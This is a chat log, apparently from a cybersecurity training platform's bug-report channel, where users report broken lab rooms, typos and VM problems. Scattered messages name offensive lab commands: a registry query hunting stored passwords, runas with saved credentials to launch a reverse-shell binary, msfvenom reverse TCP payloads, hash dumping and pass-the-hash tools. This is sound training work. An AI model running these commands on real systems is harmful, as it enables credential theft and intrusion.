oh yeah it does say you don't have to auth

let me try again

Even with auth it doesn’t work (as user)

did you try restarting it first?

seems it is a little glitchy. I'll add instructions to login as admin after, that should work (did for me)

but it's definitely working with auth

so no idea what's going on for you

what payload are you using?

I'm using windows/x64/shell_reverse_tcp

and then just nc to catch

is the box from https://tryhackme.com/room/uploadvulns buggy?

quite often it seems it cannot load the pages

Not as far as I'm aware -- there haven't been any other complaints.
Can you give a little more detail about what's happening?

Sure , im at Task7 where you should load java.uploadvulns.thm , sometimes page loads fast. Sometimes i get connection timeout errors in firefox. Dirbuster also got stuck allready twice will scanning the directory

That sounds like VPN stuff to me. Can you show me what's in /etc/hosts?

i did add it into /etc/hosts , but i have same issue on another box....... I will reboot my host first 🙂

Can I ping you

ye sure

For room https://tryhackme.com/room/networkservices
I went crazy before realising that the answer for this one had a space before. So the answer was (space)NAMEOFWORKGROUP. Its room Network services task 3 - third question. It this a bug or? Sorry I don't know who to tag maybe PoloMints

That's going to be answer tolerance

It does NOT have a space.

If I don't put space it didn't accept

So it kinda required the space

Thats why it drove me crazy

It does not have a space.

I'm looking at the correct answer right now. There's no space.

WORKGROUP

There's no space.

Maybe its an edge case on my comp. Because I now refreshed the page and you can see the border (now its without the space in the beginning). I am positive that I entered a space and it accepted it only that way, and entered it at least 5 times before with copying and typing. But its probably something on my side

Yes restarted twice. Not using the default msfvenom binary. Using netcat to catch the session

Which port and what binary are you using?

Port 5353 (53 already in use by AttackBox), and using the reverse.EXE binary generated via msfvenom. The same binary has worked in all prior tasks.

(That first message was meant to say “and using …”, rather than “not using”. Sorry!)

Not sure what the problem is then tbh, it worked for me earlier, I just had to log in once I restarted.

In hardeningbasicspart2 the Chapter 3 Quiz is on Task 2 when the tasks to answer it are after (3-9)
In Task 9 there's a typo:

actually the tasks are really mixed up, what should be task 2 is task 14

@clear fern just letting you know about this ^
The two hardening rooms were great I took good notes and going to apply it on my VPS

Let me retry this morning.

Tried again — I get a reverse shell, but only as a user, not as NT AUTHORITY

Ah just realised you’ve added that in real life this would only work if the administrator signed in. 🙂

@tough linden In Task 9 (same room), the query reg query HKLM /f password /t REG_SZ /s does not actually return the key referenced (reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon") -- see https://pastebin.com/pu5JfrTf, and querying the provided key does not yield a password either.

Hello there I'm facing problem in the room Windows PrivEsc room for the task 11 where there are having this resource to be downloaded in a local machine . As per the task I had downloaded the resource but it was not giving me the required output. They told to install python-crypto module in the task and to run the python script pwdump.py as mentioned in hyperlink. But it showed me the Import error even if I had installed the crypto module while running the script.I had googled for the same but I don't get the required stuff from that. Also the python script is written by using python2 version.
https://github.com/CiscoCXSecurity/creddump7

I think someone else (in the search) mentioned that there might be dependency issues with that tool. Did you manage to do task 9,in the same row?

Yeah should I dm u for that

I’m still on Task 9, but noticed the issue had come up when I searched for that room. Let me try and find it.

Ok

The issue for the same has not being fixed earlier #room-bugs message

That's it

A small typo in Task 6, Room: Linux 3.
For instance let's say you know you have the file name of test1234

Hardening basics part 2, the order of the tasks is messed up. The quiz is at the top instead of the introduction of the chapter and the content of it: Task 14 for example should be swapped with task 2. Task 5 should also be introduced after task 6.

Thanks for showing it I was too lazy to post a screenshot :d, I pinged the room creator just a few messages up

@dusky junco that's been an issue for several months now. You able to add it to your list of messes to mop up, given Nameless has been pinged a bunch of times and acknowledged at least two of them?

I am doing the WinPrivEsc room, Task 10 (Saved Creds). I am not sure what the point of running runas /savecreds /user:admin reverse.exe is, if I have to type the admin password? Surely if I know the admin password, there is no need to priv esc? I have already ran the bat file. @tough linden

theres certain circumstances where you don't have to enter the password iirc

Found a couple trivial spelling errors

Room: Network Services (https://tryhackme.com/room/networkservices)
Task: 9 - Enumerating FTP
Section: Resources
Error 1: First sentence "As we're going to be logging in to an FTP server, we're going to need to make sure therre is an ftp client installed on the system."
Error 2: Fourth sentence " If you're bought to a prompt that says: "ftp>" Then you have a working FTP client on your system."
I assume that's supposed to be "brought", and "Then" should be "then"

Battery , Was it patched ?

The intended way doesn't work anymore ?

does anyone know why flask keeps on dying when hacking on Bookstore?

I have terminated my box 3-4 times and I no longer can access the rest API

Dead link in the https://tryhackme.com/room/encryptioncrypto101. "Learn Linux" Room is private. Non Essential cuz you can just use a different VM, just didn't know if it had been brought up

anyone on overpass3 ? i restart 3 times the box and what i try to do doesnt work :/

just for know if it is on my side

only

How do you know it isn't working

when I try to change user in sudo it takes 3 years to change while I have the mdp

so maybe my connection

I don't think that's a bug

I think that's user error.

ok thanks

but anyway really cool box !

reasking here, though not sure IF a bug. battery's path to root seemed simple

maybe a permissions mistake?

yeah def a mistake i think - as root i can see content under one of the other users that i skipped past - going to retry and find the proper way to root

Not technically a 'bug' per se, but for task ||7|| of the Linux Fundamentals 3 course, I think it might benefit the question to have a different answer. I solved it on accident without actually going through the steps :s

I guess you can still go through the task itself to see if you got it the 'right way', but it was unexpected.

Hi, I am facing issue while accessing the kali linux browser based machine which says to contact system administrator to add to the allowed users list.Does anyone know why this message appears and whom should I report this to get this issue resolved.I am a subscribed user whose subscription will end on 25 Nov 2021.Any help on getting this issue resolved will be appreciated.Thanks in advance

Also I am new to discord which I am using it for the first time so please bear with me if I have posted this same things on multiple hash tag areas

Hi, this probably has already been asked, but are these files already supposed to be here? I know the binary is supposed to be found, but wasnt sure if the "next step" should be previously done

Room: linux3

Hi all, not sure if this is a bug per se or just my incompetence but I’m currently working through the room ‘Further Nmap’ and on Task 14 (practical) question 4 it asks to perform a TCP SYN scan and report the number of ports open but when I put the answer it tells me I am incorrect...not sure how much info to put here as I don’t want to give away spoilers

hey can u guys check the new ChocolateFactory
room i can't connect to the ssh

You sure you’re supposed to use SSH?

yeah i think so

I keep getting this error message when I try to deploy the machine for the Linux Fundamentals Part 1 room. Any ideas on how to fix this? fwiw right before this, it says "Connecting to Guacamole"...

Room: linux3, Task: 12. A small correction needed here. We don't technically need the .sh extension after a bash script file at all if we are running it using bash. We put the extension to make ourselves or some text editors understand that its a script file.

Ok, but it's talking about running it with ./

We can't run it using ./ even if .sh extension is present

False.

Oh

Isn't working for me

Is this script file having a shebang?

Look at the cat output.

Oh

Stock ubuntu install.

Thanks for the correction. I just verified it. I is only working in bash shell. I am using fish shell so it able to identify the .sh extension

zsh might be messing with you.

Ah fish

In bash it is working fine even without .sh extension and a shebang 🧐

Does that mean we don't need the .sh extension at all? 😅 @eternal summit

Room: Furthernmap, Task 2. Shouldn't it be 65536 ports as it starts from 0?

@tiny ginkgo look into port 0

It's not 'available'

Oh..Alright

Any explanation about this?

defaults to sh

Works even if I put any random extension.

because linux doesn't base file types on extensions

if it's not told what to run it with (the shebang), it will default run with sh

So that means there is no role for the .sh extension except for our understanding or for text editors to recognise the file..right?

correct

We do not need to manually use it

to the best of my knowledge anyway, there might be some other reason for it

Alright, so I guess the correction I mentioned here about is valid?

yes the .sh extension isn't needed at all to run the script

In /psychobreak I can't run the program downloaded from ftp

task 4

same thing after redownloading it several times, even ghidra can't load it

I don't know why this room has so many bugs now, it was fine when I uploaded it the first time. I guess I can try re-creating it at some point.

Getting an error when trying to use the room machine on the new Core Windows Processes room.

Could be AttackBox related ?

nah coz the commands are running on the Windows VM

like, savecred shouldn't require you to type the password

and the password should be in the registry

I tested it all before I released it, and I had people write walkthroughs already and they didn't have any issues

Ah okay. I did deploy the machine at least 5-6 times as did the room over a few days. Not sure what it could be

when I get a spare moment I'll just recreate it, doesn't usually take long but I want to test it all again

@hazy hinge can we get this checked, I just launched and got the same error

same here

Try it again. Give it more than 5 minutes to start everything up.

@glad badger same error

Click Reconnect

gave me that message

goes to waiting for Guacamole to connect then back

Try Reconnect a few times.

Probably needs more than 5 minutes, more like 10 minutes.

I'm at over 10, still no luck, didn't super need it for the room but I know for some of the newer users its helpful

I'll have to look at it later, as I'm testing another room.

thanks

I was able to complete Core Windows Processes room without the VM. @civic brook

I'm looking into the VM attached right now.

Core Windows Processes VM works now. @civic brook @blazing raven @lethal tulip

thanks tim

i think the room battery has a bug,because finally i get the root acess read the user flag and the root flag,so it's right?

nope the VM has no bug , whatever you see is intentionally there, there are different ways to get root 🙂

hey guys, I'm having trouble trying to access room servers via firefox

try writing http instead of https in the url

hey there, is there anything you guys could do to increase the uptime of the machine in windows privesc room?
i mean.. it says i have 2 hours but at the end of the first hour it just shuts down and i have to terminate and deploy it again for it to work properly, making me run every single command to get that reverse.exe in there all over again.
thanks 😉

@plush urchin

not sure if that still applies but ^

thank you!

In this room: https://tryhackme.com/room/breakit All the pastebins link are no longer available. Idk who should I report this to so here I am. Let me know if this is not the right place thanks

This has been reported ^

Ah that's great, may I know if it's possible to follow the update or get notified when it's fixed?

Core Windows Processes: cant login the VM windows

already restarted 2x, no effect. still connexion error. Thanks

Screenshot

@fading plume There might be a dilemma with Question #2

where is the issue?

User hash is different from the other day. Answer is still the same

Sanity checked and someone else who completed the room did as well

you mean that of charlie?

Yes Sir.

do you mind if i DM? the room is still new so can't talk about the approach here

Of course

https://tryhackme.com/room/jvmreverseengineering
Images are not loading (404)

I think Advice n.4 (Crack The Hash Level 2) should be reformulated. I was able to bypass the answer easily. Using "D.... G........", .. = letters. Perhaps tolerance is the problem.

Guys what happened to the checkmark that tells you you've already finished this room in a learning path?

TL;DR: It was removed temporarily because the code base is being refactored soon, and that makes it easier

aights! Thanksss!

Anyone else happen to go through the juce shop room and getting incorrect and/or no flags at all from the dom/persistent/reflective xss challenges?

doesn't seem to be a burp issue as the room overview suggests

I should be gettinga a flag for this right?

In the new room John The Ripper:

I'm assuming this is the correct order because :

Does anyone know why all of the rooms in the beginners path are shown as not complete? I have done most of them. When I click on them it also says I'm done. Is this a bug anyone is familiar with?

The rooms show up as complete in the "My Rooms" tab on my Profile

Just scroll up 7 messages in this channel

Oh 🤦‍♂️ Thanks for clearing that up.

John The Ripper: Task 12 appears to be out of order.

The out of order tasks in John the Ripper have been noted. Thank you for reporting.

In the Windows PrivEsc room Task2, just a heads up, that "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali ." wasn't finding the smbserver.py, so I had to locate it and change the path.
Edited to say that it was the path to the smbserver.py file on the browser based kali machine that seemed wrong. I wasn't in my own VM or anything.

Also, in Task 12 of Windows PrivEsc:
pth-exe command cannot be found in the kali terminal in the browser attackbox, and I can't seem to sudo apt install it

On room networkservices -> Enumarating FTP -> Question 1: I think that expected answer is wrong

and on the networkservices2 room, there is a link to zthlinux room which is private

https://tryhackme.com/room/breakit - the pastebin file in task1 is no longer active so cannot be completed

same with task 2

Nope, you just haven't given it long enough to boot all the services

There is a problem in connecting to SSH in Day 20 Task 25 in Advent Of Cyber 2 room.

It's the syntax for connecting SSH mentioned in the task

While connecting via SSH it connects but the password is incorrect showing Permission denied,try again error.

Password is typed correctly as mentioned in the task but still shows the error

Hey @dusky junco Hope you are well.
As covered by Bornunique911 above, the password does not work for Day 20 in AOC 2.
I have tried to login on the free attackbox as specified in the task but it does not seem to work.

Could you check it out?

same problem as @hazy tiger and @latent vessel

As shown in that error message -- someone forgot to set it to never expire

Easy fix

it should be background

That's answer tolerance -- refresh the page

oh yeah

thanks

This is in task 2 of room metasploit the answer is clearly -h but says wrong

i have even tried msfconsole -h

No, your answer is incorrect

oh sorry i just now read the -h menu

We're taking a look. Thanks (: and to you to @latent vessel

No worries man

@eternal summit I don't know if you got my report, so I'm tagging you again 😛

Hey, this just happened to me on the Windows PrivEsc room https://tryhackme.com/room/windows10privesc

I was playing advent of cyber 2019 ..... in the reverse engineering challenge the binary doesn't match the questions they provided

I think tryhackme changed the binary but not the questions as it give me incorrect answers on the values of some variables....

the answers were taking the older answers not from the binary they provided but the one they used in 2019

I solved it a day ago and I had no problems

🙂

Sorry the emoji was going wrong 😂

In the task26 i didn't find the imull instruction in my binary

is this only happening to me😂😂

the values are different i checked a writeup but the binary they provided they have different value for that particular variable

Now i'll look

yes thanks

I’m following as it is in the ‘’windows privesc task 3 ‘’ I’m getting errors in both power shell and reverse shell
Even in task4 getting errors
I have checked write ups and videos whether I’m doing it wrong but there are doing it the same way as I am (but I’m getting errors) , unable to continue like this

in the Sysmon Room, Task 4 there seems to be some confusion between ports 444 and 4444

also

not really a confusion configuration files are just wack

still seems odd, but ok

I know configuration files are wack

Hey guys. I keep losing the reverse shell on the Mr Robot box everytime I try to run an enumeration script. Does anyone have an idea of what might be happening?

This has probably been already said but i have clicked into this as it says 100% but not marked as a tick here

Intended

Ok. Thank you 👍

Room https://tryhackme.com/room/breakit is stuck at task 1/5 as the pastebin is down

ok i found the answer in a writeup but still a bug

@green ermine #room-help

This is not a bug

This is user error.

ok

does coldbox work on windows I couldn't get the ||reverse shell working||

Check your firewall.

that didn't work

pentest monkey says this ||Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows||

but I don't know how to fix it

I do exactly what needs to be done and it does not work.

yeah i got the same thing earlier well try again and again or wait sometime it will show pass

You're probably doing something wrong, screenshot your options please

No. Manan right, I did a restart some 10 times and then it worked.

If you mess up too many times, the box stops working.

I've also found the MSF version of EB to be a lot less stable than the manual version, interestingly

AutoBlue has quite literally never failed me yet

naah metasploit exploit is not stable that much

but once it passes

it gets direct nt authority

no need to migrate

or privesc

Takes me ~1 try :)

👀

Of course it gets system every time... SMB runs under the localsystem account -- who else is if gonna give you a shell as?

@obsidian kiln no i meant that in the room there is a separate section for privesc

Oh, it's poorly labelled -- it's referring to turning a standard reverse shell into a meterpreter shell.

Which also isn't necessary when using the MSF defaults these days.

yeah

oh yeah you are right its about turning to meterpreter

but also there is also a step written to migrate to a process but every process migration shows access denied and meterpreter becomes unresponsive after some time

@obsidian kiln any idea what i maybe doing wrong i completed that room after trying a lot of times due to short lived meterpreter access and not able to migrate to a process with nt authority

No idea without looking at it directly

I would be trying an automigrate myself

room: learncyberin25days, task 14, nit: the options have a minor typo

|| rant: tried not seeing the example image as mentioned in the task and then msf started yelling at me for not setting the correct option||

Don't know if this was already reported but room "break it" is broken since pastebin link is no longer working

https://tryhackme.com/room/breakit

@heavy spade that's been dead for a while and DesKel isn't around to fix it. Assuming we don't know what the text is meant to be, can I just pull it?

You can find it on the way back machine

There’s a link to the writeup somewhere in this chat

I think I have it written down one second

Perfect. I'll use that to dump it straight into the task

https://web.archive.org/web/20200812230037/https://www.embeddedhacker.com/2019/09/hacking-walkthrough-thm-break-it/

Oh, a web archive of DesKel's writeup

Mhm he luckily stored some of them, not sure about them all although

if there's no way to fix it, just pull it

I found the original text

But I'm not sure how beneficial this room really is tbh

I, uh, also see why he had them in pastebins

Look at that scroll bar on the bottom

I should have mentioned

Too much effort to place them in a zip file and attach them to the room?

This file should have the hashes in it, that is how I finished breakit
#room-bugs message

The strings are now directly in the room

lol 😂 the scroll bar is almost infinite

why there are two rooms with same name and description? contents are different though

Because there are two different rooms

Another issue with one of the machines I've encountered is in the Network services room
when searching for the profiles share, nothing is found
also tried using a script for anonymous logins and none found

https://tryhackme.com/room/shodan : room shodan got repeated text on task 7

In the Sysinternals room are you only supposed to interact with the vm via the browser?
No creds are given for RDP

Yeah, that's the only option for that room.

My in browser window wont work

Ive terminated and brought it back up a couple times, just a white square 😦

Show a screenshot. It works on my end for the Sysinternals room.

Startup:

After Startup:

Url after hitting Access in browser:

Do you have an adblocker plugin in the browser, like uBlock Origin?

No, thats what I checked first

Firefox?

Im using chrome rn I can try ff

Same in FF, white box. Clicking on Access in Browser does nothing in FF

And refresh page?

uh f5 terminiated the instance lol

Are you a subscriber?

ye

Not sure what is happening. I don't have access to the backend. Let me check with someone who does.

Thanks

I will say I have a couple thm rooms open in tabs but i think I dont have any boxes up rn